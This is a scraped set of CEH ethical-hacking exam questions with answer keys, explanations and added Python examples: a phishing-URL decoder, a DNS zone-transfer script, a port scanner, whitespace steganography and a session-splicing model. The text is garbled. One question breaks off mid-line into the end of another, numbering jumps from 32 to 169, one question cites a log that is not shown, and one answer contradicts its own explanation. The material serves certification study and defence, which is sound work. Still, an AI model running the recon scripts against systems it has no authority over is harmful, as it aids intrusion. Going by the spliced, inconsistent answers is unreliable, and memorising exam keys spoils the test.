Ceh Test Questions
Submitted By cogypsy
Words 34575
Pages 139
Exam : 312-50
Title : Ethical Hacker Certified
Ver : 02-23-2009

312-50

QUESTION 1:
What is the essential difference between an 'Ethical Hacker' and a 'Cracker'?
A. The ethical hacker does not use the same techniques or skills as a cracker.
B. The ethical hacker does it strictly for financial motives unlike a cracker.
C. The ethical hacker has authorization from the owner of the target.
D. The ethical hacker is just a cracker who is getting paid.
Answer: C
Explanation: The ethical hacker uses the same techniques and skills as a cracker; the motive is to find the security weaknesses before a cracker does. Nothing says that a cracker does not get paid for his work. What sets the ethical hacker apart is the owner's (written) authorization, and he is paid whether or not he succeeds in penetrating the target.
QUESTION 2:
What does the term "Ethical Hacking" mean?
A. Someone who is hacking for ethical reasons.
B. Someone who is using his/her skills for ethical reasons.
C. Someone who is using his/her skills for defensive purposes.
D. Someone who is using his/her skills for offensive purposes.
Answer: C
Explanation: Ethical hacking is about defending yourself or your employer against malicious actors by applying the same techniques and skills an attacker would use.
QUESTION 3:
Who is an Ethical Hacker?
A. A person who hacks for ethical reasons
B. A person who hacks for an ethical cause
C. A person who hacks for defensive purposes
D. A person who hacks for offensive purposes
Answer: C
Explanation: The Ethical hacker is a security professional who applies his hacking skills for defensive purposes.

Actualtests.com - The Power of Knowing

QUESTION 4:
What is "Hacktivism"?
A. Hacking for a cause
B. Hacking ruthlessly
C. An association which groups activists
D. None of the above
Answer: A
Explanation: The term was coined by author/critic Jason Logan Bill Sack in an article about media artist Shu Lea Cheang. Acts of hacktivism are carried out in the belief that proper use of code will have leveraged effects similar to regular activism or civil disobedience.
QUESTION 5:
Where should a security tester be looking for information that could be used by an attacker against an organization? (Select all that apply)
A. CHAT rooms
B. WHOIS database
C. News groups
D. Web sites
E. Search engines
F. Organization's own web site
Answer: A, B, C, D, E, F
Explanation: A security tester should search for information everywhere he or she can reach. You never know where the small piece of information that defeats a strong defense will turn up.
QUESTION 6:
What are the two basic types of attacks? (Choose two.)
A. DoS
B. Passive
C. Sniffing
D. Active
E. Cracking
Answer: B, D

Explanation: Passive and active attacks are the two basic types of attacks.
QUESTION 7:
You are footprinting Acme.com to gather competitive intelligence. You visit the acme.com website for contact information and telephone numbers but do not find them listed there. You know that they had the entire staff directory listed on their website 12 months ago but now it is not there. How would it be possible for you to retrieve information from the website that is outdated?
A. Visit google search engine and view the cached copy.
B. Visit Archive.org site to retrieve the Internet archive of the acme website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners and customers website for this information.
Answer: B
Explanation: The Internet Archive (IA) is a non-profit organization dedicated to maintaining an archive of Web and multimedia resources. Located at the Presidio in San Francisco, California, the archive includes "snapshots of the World Wide Web" (archived copies of pages taken at various points in time), software, movies, books and audio recordings (including recordings of live concerts from bands that allow it). The site is found at www.archive.org.
QUESTION 8:
Under which Federal Statutes does the FBI investigate computer crimes involving e-mail scams and mail fraud?
A. 18 U.S.C 1029 Possession of Access Devices
B. 18 U.S.C 1030 Fraud and related activity in connection with computers
C. 18 U.S.C 1343 Fraud by wire, radio or television
D. 18 U.S.C 1361 Injury to Government Property
E. 18 U.S.C 1362 Government communication systems
F. 18 U.S.C 1831 Economic Espionage Act
G. 18 U.S.C 1832 Trade Secrets Act
Answer: B
Explanation:
http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_00001030----000-.html
QUESTION 9:

Which of the following activities will NOT be considered as passive footprinting?
A. Go through the rubbish to find out any information that might have been discarded.
B. Search on financial site such as Yahoo Financial to identify assets.
C. Scan the range of IP address found in the target DNS database.
D. Perform multiples queries using a search engine.
Answer: C
Explanation:
Passive footprinting is a method in which the attacker never makes contact with the target systems. Scanning the range of IP addresses found in the target DNS is considered making contact to the systems behind the IP addresses that is targeted by the scan.
QUESTION 10:
Which one of the following is defined as the process of distributing incorrect
Internet Protocol (IP) addresses/names with the intent of diverting traffic?
A. Network aliasing
B. Domain Name Server (DNS) poisoning
C. Reverse Address Resolution Protocol (ARP)
D. Port scanning
Answer: B
Explanation:
DNS poisoning is the correct answer. An attacker who can alter the authoritative DNS records (which should not be possible) can point a name at an address he controls. If the real records are out of his reach, he can instead inject bogus data into the cache of a resolver, which is referred to as cache poisoning. Either way, clients that trust the answer are diverted to the wrong host, and the same technique can be used to deny service by pointing names at unreachable addresses.
QUESTION 11:
You are footprinting an organization to gather competitive intelligence. You visit the company's website for contact information and telephone numbers but do not find them listed there. You know that they had the entire staff directory listed on their website 12 months ago but now it is not there.
How would it be possible for you to retrieve information from the website that is outdated?
A. Visit Google's search engine and view the cached copy.
B. Visit the Archive.org web site to retrieve the Internet archive of the company's website.
C. Crawl the entire website and store it on your computer.
D. Visit the company's partners and customers website for this information.
Answer: B
Explanation: Archive.org mirrors websites and indexes the snapshots by crawl date, with history going back to 1996. Google is incorrect because its cache holds only the most recent crawl; it is overwritten on each subsequent crawl. Crawling the site yourself is incorrect because that only yields what is online today. Visiting partner and customer websites is simply bogus. The answer is therefore B, archive.org.
QUESTION 12:
A Certkiller security System Administrator is reviewing the network system log files.
He notes the following:
- Network log files are at 5 MB at 12:00 noon.
- At 14:00 hours, the log files are 3 MB.
What should he assume has happened and what should he do about the situation?
A. He should contact the attacker's ISP as soon as possible and have the connection disconnected.
B. He should log the event as suspicious activity, continue to investigate, and take further steps according to site security policy.
C. He should log the file size, and archive the information, because the router crashed.
D. He should run a file system check, because the Syslog server has a self correcting file system problem.
E. He should disconnect from the Internet discontinue any further unauthorized use, because an attack has taken place.
Answer: B
Explanation: You should never assume a host has been compromised without verification, but a log file that has shrunk between two readings is a classic sign of tampering (attackers routinely truncate or delete logs to cover their tracks), so the event must be recorded and investigated. Disconnecting a server is an extreme measure and should only be done when a compromise is confirmed or the server holds data so sensitive that the loss of service outweighs the risk. Never assume that some administrator or automatic process (log rotation, for instance) made the change. Always establish the root cause of the change and follow your organization's security policy.
QUESTION 13:
What does "message repudiation" refer to in the realm of e-mail security?
A. Message repudiation means a user can validate which mail server or servers a message was passed through.
B. Message repudiation means a user can claim damages for a mail message that damaged their reputation.
C. Message repudiation means a recipient can be sure that a message was sent from a particular person.
D. Message repudiation means a recipient can be sure that a message was sent from a certain host.
E. Message repudiation means a sender can claim they did not actually send a particular message.
Answer: E
Explanation: Repudiation is the denial of message submission or delivery: a sender can claim never to have sent a message, and no third party is able to prove that the communication between the two parties took place. This is a desirable quality if you do not want your communications to be traceable.
Non-repudiation is the opposite quality: a third party can prove that a communication between two other parties took place. Non-repudiation is desirable if you want to be able to trace your communications and prove that they occurred; for e-mail it is normally provided by digital signatures.
QUESTION 14:
How does Traceroute map the route that a packet travels from point A to point B?
A. It uses a TCP Timestamp packet that will elicit a time exceed in transit message.
B. It uses a protocol that will be rejected at the gateways on its way to its destination.
C. It manipulates the value of time to live (TTL) parameter packet to elicit a time exceeded in transit message.
D. It manipulated flags within packets to force gateways into generating error messages.
Answer: C
Explanation:
Traceroute works by increasing the time-to-live (TTL) value of each successive batch of packets sent. The first three packets have a TTL of one (implying that they make a single hop). The next three packets have a TTL of 2, and so on. When a packet passes through a router, the router normally decrements the TTL by one and forwards the packet to the next hop. When a packet with a TTL of one reaches a router, the router discards it and sends an ICMP Time Exceeded (type 11) message back to the sender. The traceroute utility uses these returning messages to produce the list of routers the packets traversed en route to the destination.
QUESTION 15:
Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds them to be abnormal. If you were the penetration tester, why would you find this abnormal?
(Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniffer dump.)
05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
...
05/20-17:06:58.685879 192.160.13.4:31337 -> 172.16.1.101:1024
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
What is odd about this attack? (Choose the most appropriate statement)
A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags.
B. This is Back Orifice activity as the scan comes from port 31337.
C. The attacker wants to avoid creating a sub-carrier connection that is not normally valid.
D. These packets were created by a tool; they were not created by a standard IP stack.
Answer: B
Explanation:
Port 31337 is normally used by Back Orifice. Note that 31337 is hacker spelling of 'eleet' ('elite'). Observe also that the IP ID (242) and the sequence number are identical on every probe and that the FIN/RST/PUSH flag combination is one no standard TCP stack emits: the packets were clearly crafted by a tool, which is why a passive fingerprinter would not attribute them to a real operating system.
QUESTION 16:
Your Certkiller trainee Sandra asks you which are the four existing Regional Internet Registries (RIRs)?
A. APNIC, PICNIC, ARIN, LACNIC
B. RIPE NCC, LACNIC, ARIN, APNIC
C. RIPE NCC, NANIC, ARIN, APNIC
D. RIPE NCC, ARIN, APNIC, LATNIC
Answer: B
Explanation: All other answers include non-existent organizations (PICNIC, NANIC, LATNIC). See http://www.arin.net/library/internet_info/ripe.html. Note that the question predates AfriNIC, which became the fifth RIR in 2005 (it appears in Question 23); today there are five.
QUESTION 17:
A very useful resource for passively gathering information about a target company is:
A. Host scanning
B. Whois search
C. Traceroute
D. Ping sweep
Answer: B
Explanation: A, C & D are "Active" scans, the question says: "Passively"
QUESTION 18:
You receive an email with the following message:
Hello Steve,
We are having technical difficulty in restoring user database records after the recent blackout. Your account data is corrupted. Please log on to SuperEmailServices.com and change your password:
http://www.supermailservices.com@0xde.0xad.0xbe.0xef/support/logon.htm
If you do not reset your password within 7 days, your account will be permanently disabled, locking you out of our e-mail services.
Sincerely,
Technical Support
SuperEmailServices
From this e-mail you suspect that this message was sent by some hacker, since you have been using their e-mail services for the last 2 years and they have never sent out an e-mail such as this. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbe.0xef, which looks like hexadecimal numbers.
You immediately enter the following at a Windows 2000 command prompt:
ping 0xde.0xad.0xbe.0xef
You get a response with a valid IP address.
What is the obfuscated IP address in the e-mail URL?
A. 222.173.190.239
B. 233.34.45.64
C. 54.23.56.55
D. 199.223.23.45
Answer: A
Explanation: 0x denotes hexadecimal: DE = 222, AD = 173, BE = 190 and EF = 239. Everything before the '@' in the URL is the userinfo part, so the browser ignores 'www.supermailservices.com' and connects to the numeric host that follows it; ping accepts the same hex spelling, which is why it resolved.
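As an added example (not part of the original question bank), the following Python decodes URLs of the kind shown above: it separates the decoy userinfo from the real host and turns any inet_aton()-style spelling of an address (hex, octal or decimal components, and the one-, two- and three-component forms that ping also accepts) into dotted decimal. The URL constant is the one from the question; everything else is illustrative.

```python
import re
from urllib.parse import urlsplit


def parse_part(part: str) -> int:
    """Decode one dotted component the way inet_aton() does: 0x.. is hex,
    a leading 0 means octal, otherwise decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)          # int('', 16) raises ValueError on a bare '0x'
    if len(part) > 1 and part.startswith("0"):
        if not re.fullmatch(r"0[0-7]+", part):
            raise ValueError(f"bad octal component {part!r}")
        return int(part, 8)
    if not part.isdigit():
        raise ValueError(f"non-numeric component {part!r}")
    return int(part, 10)


def normalize_ip(host: str) -> str:
    """Canonical dotted decimal for any inet_aton() spelling: a.b.c.d, a.b.c,
    a.b or a single 32-bit number, with hex, octal or decimal components."""
    parts = [parse_part(p) for p in host.split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError("one to four components expected")
    last_bits = 32 - 8 * (len(parts) - 1)          # the last component fills what is left
    if any(p > 0xFF for p in parts[:-1]) or parts[-1] >= (1 << last_bits):
        raise ValueError("component out of range")
    value = 0
    for p in parts[:-1]:
        value = (value << 8) | p
    value = (value << last_bits) | parts[-1]
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def decoy_name(url: str) -> str:
    """The text before '@' is userinfo, not a host: it is the phisher's bait."""
    return urlsplit(url).username or ""


def real_destination(url: str) -> str:
    """The host the browser actually connects to, canonicalized if numeric."""
    host = urlsplit(url).hostname or ""
    try:
        return normalize_ip(host)
    except ValueError:
        return host                                   # an ordinary DNS name


# The URL from the question above.
PHISH_URL = "http://www.supermailservices.com@0xde.0xad.0xbe.0xef/support/logon.htm"

if __name__ == "__main__":
    print("decoy:", decoy_name(PHISH_URL))
    print("real :", real_destination(PHISH_URL))
```

The same address can be written as 0xdeadbeef, 3735928559, 0336.0255.0276.0357 or 222.173.48879; a filter that only recognises the four-component decimal form misses all of them, so canonicalize before comparing against a blocklist.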
QUESTION 19:
Which of the following tools are used for footprinting? (Choose four.)
A. Sam Spade
B. NSLookup
C. Traceroute
D. Neotrace
E. Cheops
Answer: A, B, C, D
Explanation: All of the tools listed are used for footprinting except Cheops.
QUESTION 20:
According to the CEH methodology, what is the next step to be performed after footprinting?
A. Enumeration
B. Scanning
C. System Hacking
D. Social Engineering
E. Expanding Influence
Answer: B
Explanation: Once footprinting has been completed, scanning should be attempted next. Scanning should take place on two distinct levels: network and host.
QUESTION 21:
NSLookup is a good tool to use to gain additional information about a target network. What does the following command sequence accomplish?
nslookup
> server
> set type=any
> ls -d
A. Enables DNS spoofing
B. Loads bogus entries into the DNS table
C. Verifies zone security
D. Performs a zone transfer
E. Resets the DNS cache
Answer: D
Explanation: If DNS has not been properly secured, the command sequence above performs a zone transfer: 'server' points nslookup at the target's name server, 'set type=any' asks for every record type, and 'ls -d' requests the whole zone (an AXFR over TCP port 53). A correctly configured server restricts transfers to its own secondaries and answers "Query refused".
QUESTION 22:

While footprinting a network, what port/service should you look for to attempt a zone transfer?
A. 53 UDP
B. 53 TCP
C. 25 UDP
D. 25 TCP
E. 161 UDP
F. 22 TCP
G. 60 TCP
Answer: B
Explanation: If TCP port 53 is open, the opportunity to attempt a zone transfer is there. Ordinary lookups run over UDP 53, but AXFR is carried over TCP, so a name server that does not expose TCP 53 cannot be asked for its zone.
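The nslookup sequence in Question 21 and the TCP 53 check in Question 22 amount to one operation: a DNS query of type AXFR carried over TCP. The following Python, added here as an example and not part of the original question bank, builds that query by hand with the standard library only, sends it with the two-byte length prefix TCP DNS requires, and classifies the header of the first response message. The server and zone in the usage line are placeholders; run it only against servers you are authorized to test.

```python
import socket
import struct

QTYPE_AXFR = 252   # RFC 5936: ask for the whole zone
QCLASS_IN = 1
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
               4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}


def encode_name(name: str) -> bytes:
    """DNS wire form of a domain name: length-prefixed labels, zero terminator."""
    out = bytearray()
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError(f"bad label {label!r}")
        out.append(len(raw))
        out += raw
    out.append(0)
    return bytes(out)


def build_axfr_query(zone: str, txid: int = 0x1234) -> bytes:
    """12-byte header plus one question (zone, type AXFR, class IN).  Flags are
    zero: a plain query with no recursion requested, since a transfer is asked
    of the authoritative server directly."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    question = encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, QCLASS_IN)
    return header + question


def parse_header(msg: bytes) -> dict:
    """Pull the fields a tester cares about out of a response header."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": txid, "qr": flags >> 15, "rcode": flags & 0xF,
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def classify(hdr: dict) -> str:
    """What the first response message tells us about transfer policy."""
    if hdr["rcode"] != 0:
        return f"transfer denied ({RCODE_NAMES.get(hdr['rcode'], hdr['rcode'])})"
    if hdr["ancount"] == 0:
        return "no records returned"
    return f"ZONE TRANSFER ALLOWED: {hdr['ancount']} records in the first message"


def _read_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def try_axfr(server: str, zone: str, timeout: float = 5.0) -> dict:
    """Send the AXFR over TCP 53 (RFC 1035 4.2.2: each message is prefixed by its
    16-bit length) and return the parsed header of the first response message.
    A full transfer arrives as several such messages; the first is enough to
    tell whether the server is willing."""
    query = build_axfr_query(zone)
    with socket.create_connection((server, 53), timeout=timeout) as sock:
        sock.sendall(struct.pack("!H", len(query)) + query)
        (length,) = struct.unpack("!H", _read_exact(sock, 2))
        return parse_header(_read_exact(sock, length))


if __name__ == "__main__":
    # Placeholders: substitute a name server and zone you are authorized to test.
    print(classify(try_axfr("ns1.example.net", "example.com")))
```

REFUSED or NOTAUTH is what a well-run server returns to anyone but its secondaries; a NOERROR answer carrying records means every hostname in the zone is being handed to whoever asks, and the fix is an allow-transfer list (BIND) or the zone transfer tab in Windows DNS.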
QUESTION 23:
Your lab partner is trying to find out more information about a competitor's web site. The site has a .com extension. She has decided to use some online whois tools and look in one of the regional Internet registries. Which one would you suggest she looks in first?
A. LACNIC
B. ARIN
C. APNIC
D. RIPE
E. AfriNIC
Answer: B
Explanation: Regional Internet Registries maintain the records for the IP address space they administer. ARIN covers North America and part of the Caribbean (Latin America and the rest of the Caribbean moved to LACNIC in 2002), so for a .com site that is most likely hosted in the United States, ARIN is the sensible starting point. Note that an RIR whois lookup returns the holder of the IP range, not the domain registrant; the registrant comes from the domain registry's whois.
QUESTION 24:
Network Administrator Patricia is doing an audit of the network. Below are some of her findings concerning DNS. Which of these would be a cause for alarm?
Select the best answer.
A. There are two external DNS Servers for Internet domains. Both are AD integrated.
B. All external DNS is done by an ISP.
C. Internal AD Integrated DNS servers are using private DNS names that are unregistered.
D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server.
Answer: A
Explanations:
A. There are two external DNS Servers for Internet domains. Both are AD integrated.
This is the correct answer. Having an Internet-facing DNS server that is AD integrated is a serious cause for alarm: an AD-integrated zone can only be hosted on a domain controller, so this places a domain controller on the Internet and exposes the internal namespace (including the SRV records that locate domain services). There is no need for it, and it creates a serious vulnerability on the network.
B. All external DNS is done by an ISP.
This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk as it is offloaded onto the ISP.
C. Internal AD Integrated DNS servers are using private DNS names that are unregistered. This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk.
D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server.
This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk.
QUESTION 25:
Doug is conducting a port scan of a target network. He knows that his client target network has a web server and that there is a mail server also which is up and running. Doug has been sweeping the network but has not been able to elicit any response from the remote target. Which of the following could be the most likely cause behind this lack of response? Select 4.
A. UDP is filtered by a gateway
B. The packet TTL value is too low and cannot reach the target
C. The host might be down
D. The destination network might be down
E. The TCP window size does not match
F. ICMP is filtered by a gateway
Answer: A, B, C, F
Explanation: If the destination host or the destination network is down there is no way to get an answer, and if the TTL (Time To Live) is set too low the probes "die" before reaching the host because there are too many hops between the scanning computer and the target. A gateway that filters UDP or ICMP silently discards the UDP probes or the ICMP replies (echo reply, port unreachable) that the scanner relies on. The TCP receive window size is simply the amount of received data (in bytes) that can be buffered during a connection: the sending host can send only that much before it must wait for an acknowledgment and window update from the receiver, so a "mismatch" is not a reason for silence.

QUESTION 26:
Exhibit

Joe Hacker runs the hping2 hacking tool to predict the target host's sequence numbers in one of the hacking session.
What does the first and second column mean? Select two.
A. The first column reports the sequence number
B. The second column reports the difference between the current and last sequence number
C. The second column reports the next sequence number
D. The first column reports the difference between current and last sequence number
Answer: A, B
QUESTION 27:
While performing a ping sweep of a subnet you receive an ICMP reply of Type 3/Code 13 for all the pings sent out.
What is the most likely cause behind this response?
A. The firewall is dropping the packets.
B. An in-line IDS is dropping the packets.
C. A router is blocking ICMP.
D. The host does not respond to ICMP packets.
Answer: C
Explanation: Type 3 message = Destination Unreachable [RFC792], Code 13 (cause)
= Communication Administratively Prohibited [RFC1812]

QUESTION 28:
The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. Study the log given below and answer the following question:
(Note: The objective of this question is to test whether the student has learnt about passive OS fingerprinting (which should tell them the OS from log captures); can they tell a SQL injection attack signature; can they infer if a user ID has been created by an attacker; and whether they can read plain source-destination entries from log entries.)

What can you infer from the above log?
A. The system is a windows system which is being scanned unsuccessfully.
B. The system is a web application server compromised through SQL injection.
C. The system has been compromised and backdoored by the attacker.
D. The actual IP of the successful attacker is 24.9.255.53.
Answer: A
QUESTION 29:
Bob has been hired to perform a penetration test on Certkiller.com. He begins by looking at IP address ranges owned by the company and details of domain name registration. He then goes to news groups and financial web sites to see if they are leaking any sensitive information or have any technical details online.
Within the context of penetration testing methodology, what phase is Bob involved with?
A. Passive information gathering
B. Active information gathering
C. Attack phase
D. Vulnerability Mapping
Answer: A
Explanation: He is gathering information and as long as he doesn't make contact with any of the targets systems he is considered gathering this information in a passive mode.
QUESTION 30:
Which of the following would be the best reason for sending a single SMTP message to an address that does not exist within the target company?
A. To create a denial of service attack.
B. To verify information about the mail administrator and his address.
C. To gather information about internal hosts used in email treatment.
D. To gather information about procedures that are in place to deal with such messages.
Answer: C
Explanation: The reply from the e-mail server stating that there is no such recipient (the bounce) also gives you information such as the name of the mail server, the software version, and the internal hosts that handled the message, which appear in the Received headers of the bounce.
QUESTION 31:
You are conducting a port scan on a subnet that has ICMP blocked. You have discovered 23 live systems and after scanning each of them you notice that they all show port 21 in closed state.
What should be the next logical step that should be performed?
A. Connect to open ports to discover applications.
B. Perform a ping sweep to identify any additional systems that might be up.
C. Perform a SYN scan on port 21 to identify any additional systems that might be up.
D. Rescan every computer to verify the results.
Answer: C
Explanation: As ICMP is blocked you'll have trouble determining which computers are up and running by using a ping sweep. As all the 23 computers that you had discovered earlier had port 21 closed, probably any additional, previously unknown, systems will also have port 21 closed. By running a SYN scan on port 21 over the target network you might get replies from additional systems.

QUESTION 32:
Ann would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point.
Which of the following types of scans would be the most accurate and reliable option?
A. A half-scan
B. A UDP scan
C. A TCP Connect scan
D. A FIN scan
Answer: C
Explanation: A TCP Connect scan, named after the Unix connect() system call is the most accurate scanning method. If a port is open the operating system completes the
TCP three-way handshake, and the port scanner immediately closes the connection.
Otherwise an error code is returned.
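The connect() scan described here, as an added example (not from the original page): a small Python scanner that reports a port open only when the full three-way handshake completes, exercised against a throwaway listener on 127.0.0.1 so it runs without a remote target. Port numbers are chosen by the OS at run time; nothing else is assumed.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def connect_scan(host, ports, timeout=0.5, workers=64):
    """Report a port open only if connect_ex() returns 0, i.e. the kernel
    completed SYN / SYN-ACK / ACK with the target.  Leaving the `with` block
    closes the socket, which tears the connection down again."""
    def probe(port):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            return port, sock.connect_ex((host, port)) == 0
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(port for port, is_open in pool.map(probe, ports) if is_open)


def start_listener(host="127.0.0.1"):
    """Throwaway TCP service (accepts and immediately closes) so the scan has
    something to find.  Binding to port 0 lets the OS choose a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:           # listener shut down: stop serving
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def stop_listener(srv):
    try:
        srv.shutdown(socket.SHUT_RDWR)   # wakes the blocked accept()
    except OSError:
        pass
    srv.close()


def free_port(host="127.0.0.1"):
    """A port that is currently closed: bind to 0, note the number, release it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind((host, 0))
        return sock.getsockname()[1]


def demo():
    """Scan one open and one closed loopback port; return what was found."""
    srv, open_port = start_listener()
    closed_port = free_port()
    try:
        found = connect_scan("127.0.0.1", [closed_port, open_port])
    finally:
        stop_listener(srv)
    return {"open_port": open_port, "closed_port": closed_port, "found": found}


if __name__ == "__main__":
    print(demo())
```

Because the handshake completes, the target's accept() succeeds and the connection shows up in application logs, which is the trade-off against a SYN (half-open) scan: connect() is the most reliable answer and the least stealthy. nmap's -sT option is the same technique.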
Example of a three-way handshake followed by a reset:
Source Destination Summary
-------------------------------------
[192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 SYN SEQ=3362197786 LEN=0 WIN=5840
[192.168.0.10] [192.168.0.8] TCP: D=49389 S=80 SYN ACK=3362197787 SEQ=58695210 LEN=0 WIN=65535
[192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 ACK=58695211 WIN
c:\winnt\system32\calc.exe:anyfile.exe
A. HFS
B. ADS
C. NTFS
D. Backdoor access
Answer: B

Explanation: ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams and the data streams are accessed by filename:stream.
QUESTION 169:
Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that the server might perform undesirable actions.
Alternatively, the attacker could pose as the server or client after a legitimate authentication and gain unauthorized access to data. Which of the following is NOT a means that can be used to minimize or protect against such an attack?
A. Timestamps
B. SMB Signing
C. File permissions
D. Sequence numbers monitoring
Answer: C
Explanation: SMB signing, sequence numbers and timestamps are all protocol-level integrity and anti-replay measures that let the endpoints detect packets that were modified, replayed or injected in transit. File permissions are evaluated only after authentication; an attacker who has interposed himself in an already-authenticated session inherits the legitimate user's permissions, so they do nothing against this attack.
QUESTION 170:
Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces?
A. Snow
B. Gif-It-Up
C. NiceText
D. Image Hide
Answer: A
Explanation: The program snow is used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.
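An added example (not part of the original page, and not snow's own code) of how whitespace steganography works: the following Python hides bytes as trailing spaces and tabs, one bit per character and eight per line, and shows the check a defender can run to flag carrier lines. snow's real format differs (it packs up to 3 bits into each tab-delimited run of spaces and can encrypt the payload with ICE); the cover text and secret below are constructed for the example.

```python
def hide(cover: str, secret: bytes) -> str:
    """Append the secret's bits to the cover text as trailing whitespace:
    one bit per character (space = 0, tab = 1), eight characters per line,
    so every secret byte occupies one line.  Blank lines are added if the
    cover is too short.  Pre-existing trailing whitespace is stripped first
    so the decoder sees only our bits."""
    lines = [line.rstrip(" \t") for line in cover.split("\n")]
    chunks = [f"{byte:08b}" for byte in secret]
    while len(lines) < len(chunks) + 1:        # keep a final bare line
        lines.append("")
    for i, bits in enumerate(chunks):
        lines[i] += "".join("\t" if b == "1" else " " for b in bits)
    return "\n".join(lines)


def reveal(text: str) -> bytes:
    """Read each line's trailing whitespace back as one byte."""
    out = bytearray()
    for line in text.split("\n"):
        tail = line[len(line.rstrip(" \t")):]
        if len(tail) == 8:
            out.append(int("".join("1" if c == "\t" else "0" for c in tail), 2))
    return bytes(out)


def carrier_lines(text: str) -> list:
    """Defender's check: 1-based numbers of lines that end in whitespace.
    Editors rarely leave tab/space mixtures at line ends, so a long run of
    such lines in an innocuous document is a cheap indicator worth a look."""
    return [n for n, line in enumerate(text.split("\n"), 1)
            if line != line.rstrip(" \t")]


# Constructed sample cover text and payload for the example.
COVER = "Meeting moved to Thursday.\nBring the Q3 numbers.\nThanks,\nDana\n"
SECRET = b"pw:hunter2"

if __name__ == "__main__":
    stego = hide(COVER, SECRET)
    print(repr(stego))
    print("recovered:", reveal(stego))
    print("carrier lines:", carrier_lines(stego))
```

The visible text is unchanged, which is the whole point; what gives it away is the trailing whitespace, so a mail gateway or DLP rule that strips or flags trailing tabs and spaces removes this channel entirely.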
QUESTION 171:
_____ is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer
A. Steganography
B. Merge Streams
C. NetBIOS vulnerability
D. Alternate Data Streams
Answer: D
Explanation: ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams and the data streams are accessed by filename:stream.
QUESTION 172:
LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user's password. How do you disable LM authentication in Windows XP?
A. Stop the LM service in Windows XP
B. Disable LSASS service in Windows XP
C. Disable LM authentication in the registry
D. Download and install LMSHUT.EXE tool from Microsoft website
Answer: C
Explanation: See http://support.microsoft.com/kb/299656. LM is disabled through the registry (or the equivalent security policy setting): LmCompatibilityLevel under HKLM\SYSTEM\CurrentControlSet\Control\Lsa controls which challenge/response types the client sends and the server accepts, and the NoLMHash value in the same key stops the LM hash from being stored at all. There is no "LM service" to stop, and LSASS must keep running.
QUESTION 173:
How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction? A characteristic of this attack would be a continuous stream of small packets.
A. Session Splicing
B. Session Stealing
C. Session Hijacking
D. Session Fragmentation
Answer: A
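Added here as an example (not part of the original page): a Python model of the evasion and of the stream reassembly that defeats it. A per-packet matcher never sees the whole pattern because the attacker spreads it over tiny segments; a matcher that rebuilds the TCP stream first does. The signature, the request and the sequence numbers are constructed for the illustration.

```python
import re
from typing import NamedTuple


class Segment(NamedTuple):
    seq: int          # TCP sequence number of the first payload byte
    payload: bytes


# A content rule of the kind a signature IDS carries (hypothetical, for the example).
SIGNATURE = re.compile(rb"/etc/passwd")


def per_packet_alerts(segments) -> list:
    """Naive matcher: inspects each packet on its own.  Spliced traffic never
    puts the whole pattern inside one packet, so this returns nothing."""
    return [s.seq for s in segments if SIGNATURE.search(s.payload)]


def reassemble(segments, isn: int) -> bytes:
    """Rebuild the byte stream the server will see: order by sequence number,
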